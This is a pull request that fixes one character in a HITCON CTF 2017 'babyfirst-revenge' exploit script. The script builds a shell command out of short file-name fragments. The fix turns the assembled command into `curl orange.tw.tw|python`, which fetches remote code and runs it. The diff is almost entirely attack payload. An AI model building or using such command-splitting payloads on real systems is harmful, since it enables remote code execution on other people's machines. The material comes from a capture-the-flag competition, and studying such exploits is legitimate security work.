### PR TITLE
Fix typo in exploit

### DIFF
--- a/hitcon-ctf-2017/babyfirst-revenge/exploit.py
+++ b/hitcon-ctf-2017/babyfirst-revenge/exploit.py
@@ -11,11 +11,11 @@ payload = [
     '>\>g', 
     'ls>>_', 
 
-    # generate `curl orange.tw.tw>python`
+    # generate `curl orange.tw.tw|python`
     '>on', 
     '>th\\', 
     '>py\\', 
-    '>\>\\', 
+    '>\|\\', 
     '>tw\\',
     '>e.\\', 
     '>ng\\', 


### PR DESCRIPTION
I think this is a typo, it should generate `curl orange.tw.tw|python` not `curl orange.tw.tw>python`.